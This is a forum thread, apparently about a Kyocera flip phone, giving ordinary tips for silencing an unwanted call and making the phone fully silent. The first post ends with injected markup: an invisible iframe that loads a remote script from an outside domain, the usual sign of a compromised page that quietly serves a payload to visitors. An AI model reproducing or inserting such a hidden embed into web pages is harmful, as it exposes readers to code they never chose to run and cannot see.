+ Reply to Thread

Silence ring from unwanted call

Here is scenario -- I am in public, quiet place; phone rings, I see from caller ID that I don;t want to take call. Is there anyway to silence ringer without answering and without opening flip? If I open flip, I answer the call. And, I don;t want to change the flip open/answer function.

Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Silence ring from unwanted call

Originally posted by DougF
    Here is scenario -- I am in public, quiet place; phone rings, I see from caller ID that I don;t want to take call. Is there anyway to silence ringer without answering and without opening flip? If I open flip, I answer the call. And, I don;t want to change the flip open/answer function.

Thanks
    Simply touch either of the volume buttons on the side of the phone. It will silence the ringer for the remainder of that call. Next call will ring as usual. If you want to put the phone in vibrate mode, so you won't be disturbed by additional rings, press and hold the down volume button until you feel it vibrate (not sure if this will work when the phone is actually ringing an incoming call, or if you need to wait for that call to complete first).

Alan

Excellent. Thanks very much for quick response

On my retired TM-510 you could press either volume button once to silence the ringer for that call. If you pressed it twice the call would immediately go to voicemail (I guess the phone would send something in response to the page indicating that it was unavailable or something so the system would immediately transfer the call to voice mail). I haven't had a chance to try this yet.
    -Quick

How do you turn the ring & vibrate off?

A different but related question. How do you turn both the ringer and vibrate off (e.g. you want to leave the phone on but have it totally silent)? In Phone Pref I only see options for Ring Only, Vibrate then Ring, Vibrate Only. Seems strange there isn't a 'Silence' option.

There's no one-button solution, AFAIK.
    In phone prefs -> phone alerts, set the silence option to "Lights Only"

Thanks for the fast reply, your approach works well. Only thing that could make it better is if Kyocera added 'Silent' to the Phone Pref>Incoming Calls>Call/Ring Vibe menu. Seems more logical, but I can certainly live with the solution you discovered. Gotta carefully pick ones battles.

You would think that if you had the incoming calls setting at ring only, that when you changed it to mute it would be silent but instead it vibrates. I think this is pretty standard cell phone action.

Another way people have found is to make a ringer that is silent and turn that on. Maybe someone has posted one in the files section.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Originally posted by tmwebsites

Another way people have found is to make a ringer that is silent and turn that on. Maybe someone has posted one in the files section.
    good idea...